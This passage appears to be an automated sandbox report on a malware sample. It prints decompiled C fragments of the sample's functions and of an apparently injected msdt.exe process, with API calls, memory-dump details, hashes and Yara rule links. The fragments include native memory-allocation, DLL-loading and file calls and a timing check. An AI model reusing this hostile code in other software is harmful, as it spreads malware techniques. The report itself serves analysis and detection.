						_t34 = _t34 + 8;
					}
					_t19 = E0041B060(_v8);
					_v16 = _t19;
					__eflags = _t19;
					if(_t19 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t19;
				} else {
					return _t16;
				}
			}

0x0040accc
0x0040accd
0x0040accd
0x0040acd6
0x0040acda
0x0040acde
0x0040acdf
0x0040ace4
0x0040ace9
0x0040acf3
0x0040acf8
0x0040acfb
0x0040acfd
0x0040ad05
0x0040ad0a
0x0040ad0a
0x0040ad11
0x0040ad19
0x0040ad1c
0x0040ad1e
0x0040ad32
0x00000000
0x0040ad34
0x0040ad3a
0x0040acee
0x0040acee
0x0040acee

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD32

Memory Dump Source

Source File: 00000002.00000002.271759411.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
Instruction ID: f2ae6e5e7806921c9eae43ef0be609edf832a6aa20f0d9e7e2e66c408c20611a
Opcode Fuzzy Hash: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
Instruction Fuzzy Hash: E40152B5D4020DABDB10DAE1DC82FDEB7789B14308F0041AAA908A7281F634EB54CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0041A0FA, Relevance: 1.5, APIs: 1, Instructions: 33
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E0041A0FA(void* __edx, void* _a4, PVOID* _a8, long _a12, long* _a16, long _a20, long _a24) {
				intOrPtr _v0;
				long _t16;
				void* _t24;

				asm("out 0x9d, eax");
				asm("out 0x55, al");
				_t12 = _v0;
				_t5 = _t12 + 0xc60; // 0xca0
				E0041AB20(_t24, _v0, _t5,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x30);
				_t16 = NtAllocateVirtualMemory(_a4, _a8, _a12, _a16, _a20, _a24); // executed
				return _t16;
			}

0x0041a0fd
0x0041a0ff
0x0041a103
0x0041a10f
0x0041a117
0x0041a139
0x0041a13d

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041ACF4,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 0041A139

Memory Dump Source

Source File: 00000002.00000002.271759411.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 788fd6f8e14e325e3b0101576e30d3ef5bb706a8e938ce6ef9127f1309bba39e
Instruction ID: 3607abd159d85f8be086972fdd1dd2c09c256640afe4e34ad7c85bb1e88962c9
Opcode Fuzzy Hash: 788fd6f8e14e325e3b0101576e30d3ef5bb706a8e938ce6ef9127f1309bba39e
Instruction Fuzzy Hash: 04F0F8B2205218AFCB14DF89DC81EEB77ADAF88654F158159BE1897241D630F911CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A100, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A100(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041AB20(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x0041a10f
0x0041a117
0x0041a139
0x0041a13d

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041ACF4,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 0041A139

Memory Dump Source

Source File: 00000002.00000002.271759411.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: b7acdae8d3035396bf3a6cabd8be047a375e4a620bd0b44aa6ca3e6eeb15d15e
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 35F015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241C630F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A050, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A050(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a913
				E0041AB20(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x0041a053
0x0041a056
0x0041a05f
0x0041a067
0x0041a075
0x0041a079

APIs

NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 0041A075

Memory Dump Source

Source File: 00000002.00000002.271759411.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: b02a98072ae76633dfac5978dec5414655e95fa3032167deae29744f36717898
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: B7D01776200214ABD710EB99DC85FE77BADEF48764F15449ABA189B242C530FA1087E0

Uniqueness

Uniqueness Score: -1.00%

Function 00409A80, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00409A80(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				intOrPtr _t35;
				void* _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00407E80(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00408090( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041B9D0( &_v284, 0x104);
						E0041C040( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00414DB0(E00414D50(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe055
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E004080C0( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E00408140(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					_t35 =  *_t20;
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) + _t35 + 1;
					return 1;
				} else {
					return _t24;
				}
			}

0x00409a8b
0x00409a93
0x00409a95
0x00409a9a
0x00409a9f
0x00409ab2
0x00409ab7
0x00409ac0
0x00409acc
0x00409adf
0x00409ae4
0x00409ae7
0x00409af0
0x00409b02
0x00409b07
0x00409b0c
0x00000000
0x00000000
0x00409b0e
0x00409b12
0x00000000
0x00000000
0x00409b14
0x00000000
0x00409b12
0x00409b16
0x00409b19
0x00409b1f
0x00409b21
0x00409b2c
0x00409b31
0x00409b34
0x00409b41
0x00409b4c
0x00409b4e
0x00409b54
0x00409b58
0x00409b5b
0x00409b5b
0x00409b62
0x00409b65
0x00409b65
0x00409b6a
0x00409b77
0x00409aa6
0x00409aa6
0x00409aa6

Memory Dump Source

Source File: 00000002.00000002.271759411.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05080370210f75a5a3fe5c957c173717e9568a082d75643143bc41a952943554
Instruction ID: bf50d6615e3a851f47153e1852c589cd20b96e00f5eebf3b99f7dff6005f4db2
Opcode Fuzzy Hash: 05080370210f75a5a3fe5c957c173717e9568a082d75643143bc41a952943554
Instruction Fuzzy Hash: 6E213AB2D4020857CB15DA65AD42BEF73BCAB54304F04007FE949A7182F63CBE498BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A1F0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A1F0(intOrPtr _a4, void* _a8, long _a12, char _a16) {
				void* _t10;
				void* _t15;

				E0041AB20(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t4 =  &_a16; // 0x414c6f
				_t10 = RtlAllocateHeap(_a8, _a12,  *_t4); // executed
				return _t10;
			}

0x0041a207
0x0041a20c
0x0041a21d
0x0041a221

APIs

RtlAllocateHeap.NTDLL(004144F6,?,oLA,00414C6F,?,004144F6,?,?,?,?,?,00000000,00409CC3,?), ref: 0041A21D

Strings

oLA, xrefs: 0041A20C, 0041A218

Memory Dump Source

Source File: 00000002.00000002.271759411.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID: oLA
API String ID: 1279760036-3789366272
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 91a8afe93875cd4dd2c16ce4d21e80b139c6b658c845053945d21e38953d9919
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: F1E012B1200208ABDB14EF99DC41EA777ADAF88664F11855ABA085B242C630F910CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 004082EB, Relevance: 1.6, APIs: 1, Instructions: 56
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E004082EB(void* __ebx, signed int* __esi, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t13;
				int _t14;
				signed int _t22;
				long _t23;
				int _t28;
				void* _t31;
				void* _t33;

				_t22 =  *__esi * 0x83ec8b55;
				_t31 = _t33;
				_push(__esi);
				_v68 = 0;
				E0041BA20( &_v67, 0, 0x3f);
				E0041C5C0( &_v68, 3);
				_t13 = E0040ACC0(_a4 + 0x1c,  &_v68); // executed
				_t14 = E00414E10(_a4 + 0x1c, _t13, 0, 0, 0xc4e7b6d6);
				_t28 = _t14;
				if(_t28 != 0) {
					_push(_t22);
					_t23 = _a8;
					_t14 = PostThreadMessageW(_t23, 0x111, 0, 0); // executed
					_t40 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t28(_t23, 0x8003, _t31 + (E0040A450(_t40, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
				}
				return _t14;
			}

0x004082ee
0x004082f1
0x004082f6
0x004082ff
0x00408303
0x0040830e
0x0040831e
0x0040832e
0x00408333
0x0040833a
0x0040833c
0x0040833d
0x0040834a
0x0040834c
0x0040834e
0x0040836b
0x0040836b
0x0040836d
0x00408372

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Memory Dump Source

Source File: 00000002.00000002.271759411.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 99d8379d9386ebf49612aee6c3876b60cd65c90ae19a1907122eb1926802bad4
Instruction ID: 123da540d2494929e5ea260b8ad0f85aca46baafd8b41428ebd868ad4c038490
Opcode Fuzzy Hash: 99d8379d9386ebf49612aee6c3876b60cd65c90ae19a1907122eb1926802bad4
Instruction Fuzzy Hash: 2E012832A802287AE720A6948D43FFE772CAF40B04F15001EFE04BA1C2D6B8690647E9

Uniqueness

Uniqueness Score: -1.00%

Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E004082F0(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;

				_v68 = 0;
				E0041BA20( &_v67, 0, 0x3f);
				E0041C5C0( &_v68, 3);
				_t12 = E0040ACC0(_a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E10(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A450(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x004082ff
0x00408303
0x0040830e
0x0040831e
0x0040832e
0x00408333
0x0040833a
0x0040833d
0x0040834a
0x0040834c
0x0040834e
0x0040836b
0x0040836b
0x00000000
0x0040836d
0x00408372

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Memory Dump Source

Source File: 00000002.00000002.271759411.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 0595ec560e788dbfdde41257eb2d5c19e7e4730fabfde42c32a3ab1d63c44655
Instruction ID: dfcb319d37f54b0a0ecf43278dd58f432490a67f975cf55f4cf339e9819450c2
Opcode Fuzzy Hash: 0595ec560e788dbfdde41257eb2d5c19e7e4730fabfde42c32a3ab1d63c44655
Instruction Fuzzy Hash: 1A01A731A803287BE720A6A59C43FFF776C6B40F54F05411EFF04BA1C1E6A9691546FA

Uniqueness

Uniqueness Score: -1.00%

Function 0041A262, Relevance: 1.5, APIs: 1, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 19%

			E0041A262(signed int __eax, void* __ecx, int _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a58) {
				intOrPtr _v0;
				void* _t24;
				signed int _t25;

				asm("lock scasd");
				asm("popfd");
				_a58 = _a58 - 1;
				_push(_t25);
				_t26 = _t25 | __eax;
				if(__ecx == __eax) {
					_t16 = _v0;
					_push(_t26);
					_t26 = _v0 + 0xc7c;
					E0041AB20(_t24, _t16, _v0 + 0xc7c,  *((intOrPtr*)(_t16 + 0xa14)), 0, 0x36);
					_t21 = _a4;
					ExitProcess(_a4);
				}
				return  *((intOrPtr*)( *_t26))(_a12, _a16, _a20, _a24, _a28, _t21, __ecx, __eax);
			}

0x0041a262
0x0041a264
0x0041a265
0x0041a268
0x0041a269
0x0041a26e
0x0041a273
0x0041a27c
0x0041a282
0x0041a28a
0x0041a28f
0x0041a298
0x0041a298
0x0041a2f8

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A298

Memory Dump Source

Source File: 00000002.00000002.271759411.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: aba09b2fd6a70c72fac49baff06ff0db7d3ad6c979006dc1afd5db72fb8f64d5
Instruction ID: ef661d3bbceb6e2956daad7ef3cacf876e4b5089f27eaec99f5f334fb3810964
Opcode Fuzzy Hash: aba09b2fd6a70c72fac49baff06ff0db7d3ad6c979006dc1afd5db72fb8f64d5
Instruction Fuzzy Hash: 08F049B22041187FCB14DF99CC90EEB77ADAF8C360F108559FA4897241C531E9108BB1

Uniqueness

Uniqueness Score: -1.00%

Function 0041A230, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A230(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041AB20(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a23f
0x0041a247
0x0041a25d
0x0041a261

APIs

RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A25D

Memory Dump Source

Source File: 00000002.00000002.271759411.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 9eb97300d5e10087c94d33d02e30a743291ab6cce32cf35ae9b88dc6f9268b02
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: 0EE01AB12002046BD714DF59DC45EA777ADAF88754F014559BA0857241C630F910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A390, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A390(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E0041AB20(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a3aa
0x0041a3c0
0x0041a3c4

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A3C0

Memory Dump Source

Source File: 00000002.00000002.271759411.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: bf4187e38ed515452a76a24d05e88418ebf87a1f9c5c0c5d517d21230e680a96
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: DEE01AB12002086BDB10DF49DC85EE737ADAF88654F018155BA0857241C934F8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A270, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A270(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0041AB20(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x0041a273
0x0041a28a
0x0041a298

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A298

Memory Dump Source

Source File: 00000002.00000002.271759411.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 654422823446a6dc42c61fec1171b68ac592b5503343b56bfda4b4a103558910
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 1FD017726042187BD620EB99DC85FD777ADDF487A4F0180AABA1C6B242C531BA10CBE1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: msdt.exe PID: 1736 Parent PID: 3388 msdt.exeCOMMON

Executed Functions

Function 03019F20, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,03014B77,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,03014B77,007A002E,00000000,00000060,00000000,00000000), ref: 03019F6D

Strings

.z`, xrefs: 03019F5D, 03019F68

Memory Dump Source

Source File: 00000006.00000002.567098302.0000000003000000.00000040.00000001.sdmp, Offset: 03000000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 0955bde2f37cd31d9ff687b014a5c683e6fbfd70c35d56a76418c01ddfff4e31
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 4AF0B2B2211208ABCB08CF88DC94EEB77ADAF8C754F158248BA0D97241C630F8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 03019FD0, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(03014D32,5EB6522D,FFFFFFFF,030149F1,?,?,03014D32,?,030149F1,FFFFFFFF,5EB6522D,03014D32,?,00000000), ref: 0301A015

Memory Dump Source

Source File: 00000006.00000002.567098302.0000000003000000.00000040.00000001.sdmp, Offset: 03000000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 7cb07fd84301a12587f7c54894e2ea07b83b53043824b684b9cf32b2900160b3
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: C9F0A4B6210208ABCB14DF89DC90EEB77ADAF8C754F158249BA1D97241D630E8118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0301A0FA, Relevance: 1.5, APIs: 1, Instructions: 33memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,03002D11,00002000,00003000,00000004), ref: 0301A139

Memory Dump Source

Source File: 00000006.00000002.567098302.0000000003000000.00000040.00000001.sdmp, Offset: 03000000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 602322be999435834db7c88ce08916fdfef553866787118523e3722f8fdbbb38
Instruction ID: 5e042ca05ef7617363b736a9db82de582e765f3b0b7c69ece1b7ee3f844f3201
Opcode Fuzzy Hash: 602322be999435834db7c88ce08916fdfef553866787118523e3722f8fdbbb38
Instruction Fuzzy Hash: 1EF01CB6215218AFCB14DF88DC81EEB77ADAF8C654F158159FE1897241D630F911CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 0301A100, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,03002D11,00002000,00003000,00000004), ref: 0301A139

Memory Dump Source

Source File: 00000006.00000002.567098302.0000000003000000.00000040.00000001.sdmp, Offset: 03000000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 56f8568fa941198e67c1ac8c47b86e47a73c2966b1ed898b689cb42aed70ebb9
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 0DF015B6210208ABCB14DF89DC80EEB77ADAF88650F118149BE0897241C630F810CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0301A050, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(03014D10,?,?,03014D10,00000000,FFFFFFFF), ref: 0301A075

Memory Dump Source

Source File: 00000006.00000002.567098302.0000000003000000.00000040.00000001.sdmp, Offset: 03000000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 54b2b7d539aa8bba0f791a5ccf431e8956989098c52fab10b4dcfd638c5c926a
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: E1D01776201314ABD710EB98DC85FE77BADEF88660F15449ABA189B242C530FA1087E0

Uniqueness

Uniqueness Score: -1.00%

Function 05009540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0500954A

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dbf1124da3c8842c0298b6759acc66b85678b91ecacedcc1a83c118d17a4b35b
Instruction ID: 21d22ed0b32417c28870e0fe3e966cf77dc232fc41d36760431a08b86a4e72f8
Opcode Fuzzy Hash: dbf1124da3c8842c0298b6759acc66b85678b91ecacedcc1a83c118d17a4b35b
Instruction Fuzzy Hash: C8900477311011030105F55D574450F0557D7D53D13D1C431F5005550CD771CC717177

Uniqueness

Uniqueness Score: -1.00%

Function 050095D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 050095DA

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4b9931ab5f46067b3e8764d068839687d4d09b41ed45ef3b7a26549408de5e53
Instruction ID: c974c176ba4310d7f8462acb6fb963b3eddfa84b53a5e17020ba2d6201eca695
Opcode Fuzzy Hash: 4b9931ab5f46067b3e8764d068839687d4d09b41ed45ef3b7a26549408de5e53
Instruction Fuzzy Hash: 919002A22020110341057159945461A451A97E0241B91C421E5004590DC5658891716A

Uniqueness

Uniqueness Score: -1.00%

Function 05009710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0500971A

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c2228705319309ac121134a5316edb1105a0c07311adb59ca6751185c26b7b6a
Instruction ID: fef1f0f0123a9fee3a819ba0db74317c2f6277a8804b063b91cbd3ab512a86f4
Opcode Fuzzy Hash: c2228705319309ac121134a5316edb1105a0c07311adb59ca6751185c26b7b6a
Instruction Fuzzy Hash: AC90027220101502D1006599A44864A051597E0341F91D411A9014555EC6A588917176

Uniqueness

Uniqueness Score: -1.00%

Function 05009780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0500978A

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5cc953c09aaf25497431037c5b767d427c9c5020cf6f4e11ad6c1136158e305d
Instruction ID: 0f372948f3654cd9b4fdab07a8fe2ac1d68e51a54f51946769ce60df92c91bdb
Opcode Fuzzy Hash: 5cc953c09aaf25497431037c5b767d427c9c5020cf6f4e11ad6c1136158e305d
Instruction Fuzzy Hash: 1590026A21301102D1807159A44860E051597D1242FD1D815A4005558CC95588696366

Uniqueness

Uniqueness Score: -1.00%

Function 05009FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05009FEA

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cc1664db9f89cca0bd27578505676ac60df4309181603d60858678ff0b180b11
Instruction ID: 3679abe6d78219efd74c4cecb0ed4ffac94a0daebd25c813440734723a86526e
